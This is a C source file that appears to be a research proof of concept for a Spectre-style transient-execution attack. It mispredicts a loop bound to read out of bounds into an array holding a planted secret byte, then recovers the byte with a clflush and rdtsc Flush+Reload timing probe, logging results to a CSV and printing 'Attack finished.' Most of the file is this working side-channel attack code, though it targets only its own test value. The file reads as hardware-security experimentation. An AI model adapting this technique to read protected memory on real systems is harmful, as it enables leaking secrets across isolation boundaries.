#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/sysinfo.h>
#include <unistd.h>
#include <math.h>
#include <ctype.h>
#include <getopt.h>
#include <signal.h>
#include <string.h>
#include <time.h>
#include <x86intrin.h>

#define ASLR_SIZE 1
#define ARRAY_SIZE 8
//#define INDEX_BIT   // Number of index bits, as per the example
#define CACHE_LINE 64
#define PAGE_SIZE 4096
#define KERNEL 0x200000

uint8_t secret = 42;
int result[256];
#define MEMACCESS(p)\
asm volatile ("movq (%0), %%rax\n"\
    "lfence\n"\
    :\
    : "c" (p)\
    : "rax")\

#define READ(p)\
asm volatile ("movq %%rax, (%0)\n"\
    :\
    : "c" (p)\
    : "rax")\

 void flush(void* p) {
    asm volatile ("clflush (%0)\n"
      :
      : "c" (p)
      : "rax");
  }

//const size_t memory_pool_size =  1024 * 1024 * 1024;
//int shuffle_range = memory_pool_size / PAGE_SIZE;
//int array_s[shuffle_range + 1];

uint8_t probe[256 * PAGE_SIZE];

void flushAll(void* start, int backward, int forward){
    for(int i= backward; i< forward; i+=64){
      void * address = start + (i);
      flush(address);
    }
}

uint8_t loop_function(uint8_t array_mid[], int x, uint8_t iteration, uint8_t array[], uint64_t index) {
     uint64_t idx = 0;
     //printf("%llx\n", idx);
     //getchar();
      
     uint8_t i = 0;
     uint8_t n = 0;
     uint8_t value = 0;
     //value = (*(uint8_t*)(&array[i * 64] + idx));
     //printf("%d\n", value);
     //getchar();
     uint8_t *ptr = NULL;
     //srand(time(NULL));
     
     //uint64_t mask;
     asm volatile (".rept 80\n"
		     "nop\n"
		     ".endr\n");
    for (i = 0; i < array_mid[i * 4096];) {
        //Mis-prediction
        //idx = index

         
	//READ(&array[0] + idx);
 	READ(&probe[(*(uint8_t*)(&array[0] + idx)) * PAGE_SIZE]);
	//value = (uint8_t *)(&array[0] + idx);	
	i+=1;
	//printf("%d\n", i);
	idx = (((ARRAY_SIZE)^ i) - 1) & index;
	//idx = 0;
        //MEMACCESS(&probe[(*((uint8_t*)(&array[i * 64] + idx)) + idx / index) * PAGE_SIZE]);

     }
     
     //printf("Finished\n");
     //idx = ((ARRAY_SIZE ^ ARRAY_SIZE) - 1) & index;
     //printf("%llx\n", idx);
     //getchar();
     //printf("%d\n", value);
     return value; 
}

int main(int argc, char const *argv[]) {
    uint8_t array[ARRAY_SIZE * CACHE_LINE];
    uint8_t array_mid[(ARRAY_SIZE + 1) * 4096];
    uint8_t array_out[ARRAY_SIZE * CACHE_LINE];
    int start, end;
     
    //secret = atoi(argv[1]);

    for (int i = 0; i < ARRAY_SIZE; i++) {
        array[i * CACHE_LINE] = 0;
        array_mid[i * 4096] = ARRAY_SIZE;
        array_out[i * CACHE_LINE] = secret; 
    }

    array_mid[ARRAY_SIZE * 4096] = ARRAY_SIZE;
  
    //uint8_t *mem_ptr = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED |  MAP_ANONYMOUS, -1, 0);
    
    //for (int i = 0; i < PAGE_SIZE; i+=64)
    //	    mem_ptr[i] = 3;
   
    //for (int i = 0; i < 257; i++)
    //	   probe[i * PAGE_SIZE] = 0; 
    
    //flushAll(&array, 0, ARRAY_SIZE * CACHE_LINE);
    flushAll(&array_mid, 0, (ARRAY_SIZE + 1) * 4096);
    //flushAll(&array_out, 0, ARRAY_SIZE * CACHE_LINE);
    //flushAll(&probe, 0, 257 * PAGE_SIZE);
    //flushAll(mem_ptr, 0, PAGE_SIZE);
    //uint8_t* kernel_base;

    // Set the pointer to the base virtual address of the kernel
    //kernel_base = (uint8_t*)0xffffffff80000000;
    uint64_t address = (uint64_t)(&array_out); 
    uint64_t index = (uint64_t)(&array_out[3 * 64]) - (uint64_t)((uintptr_t)&array[0 * CACHE_LINE]);
    
   // printf("Array_out is %p (%llx), Array is %p, The distance is %llx\n", mem_ptr, (uint64_t)(&mem_ptr[0]),  &array[(ARRAY_SIZE - 1) * CACHE_LINE], index);
    flushAll(&array, 0, ARRAY_SIZE * CACHE_LINE);
    flushAll(&array_out, 0, ARRAY_SIZE * CACHE_LINE); 
    //int start, end;
    int min_value = 100000;
    //getchar();
    //uint64_t index = 0;  
    int ret = 0;
    /*
    if (mprotect(mem_ptr, PAGE_SIZE, PROT_WRITE) == -1) {
	perror("mprotect");
        exit(EXIT_FAILURE);
    }
    */
    //ret = loop_function(array_mid, ARRAY_SIZE, ARRAY_SIZE, array, index);
    //mem_ptr[0]++;      
    //MEMACCESS(&array[(ARRAY_SIZE - 1) * CACHE_LINE] + index);
    uint64_t bitmask = ~((1ULL << 12) - 1);
    uint8_t *ptr = (uint8_t *)(address & bitmask);
    printf("%p\n", ptr);
    //flushAll(ptr, 0, 4096);
    //getchar();
    //flushAll(&array_out, 0, 1 * CACHE_LINE);
    mprotect(ptr, 4096, PROT_WRITE);
    flushAll(ptr, 0, 4096);
    for (int i = 0; i < 256; i++)
	    probe[i * PAGE_SIZE] = 0;
    flushAll(&probe, 0, 256 * PAGE_SIZE);
    //ret = loop_function(array_mid, ARRAY_SIZE, ARRAY_SIZE, array, 0);
    //ret = loop_function(array_mid, ARRAY_SIZE, ARRAY_SIZE, array, 0);
    ret = loop_function(array_mid, ARRAY_SIZE, ARRAY_SIZE, array, index);
    //mprotect(ptr, 4096, PROT_READ | PROT_WRITE);
    //Remove noise probe[array[0] * PAGE_SIZE] -> probe[0]
    flushAll(&probe,0, 64); 
    for (int i = 0; i < 256; i++) { 
        asm volatile("mfence");
        start = _rdtsc();
        asm volatile("mfence");
        MEMACCESS(&probe[i * PAGE_SIZE]);
        //MEMACCESS(&array_out[5 * 64]);
        //array_out[3 * 64]++;
        end = _rdtsc() - start;
        printf("");
        result[i] = end;
    }
    printf("\n");
    /* 
    for (int j = 1; j < 64; j++) {
             //asm volatile ("mfence");
         start = _rdtsc();
         asm volatile("mfence");
         MEMACCESS(&probe[j * PAGE_SIZE]);
         //MEMACCESS(mem_ptr + j * 64);
	 asm volatile("lfence");
         end = _rdtsc() - start;
	 printf("%d\n", end);
    }
     */
    //flushAll(&array, 0, ARRAY_SIZE * CACHE_LINE);
    //flushAll(&probe, 0, 257 * PAGE_SIZE);
    //munmap(mem_ptr, PAGE_SIZE);
         
    char path[30];
    strcpy(path, "results/output.csv");
    FILE *fp = fopen(path, "a+");
    if (fp == NULL) {
        fprintf(stderr, "fopen() failed.\n");
        exit(EXIT_FAILURE);
    }
    int sum = 0;

    for (int i = 0 ; i < 256; i++) {
         fprintf(fp, "%d,%d\n", i, result[i]);
    }
    
    printf("Attack finished.\n");
    return ret;
}
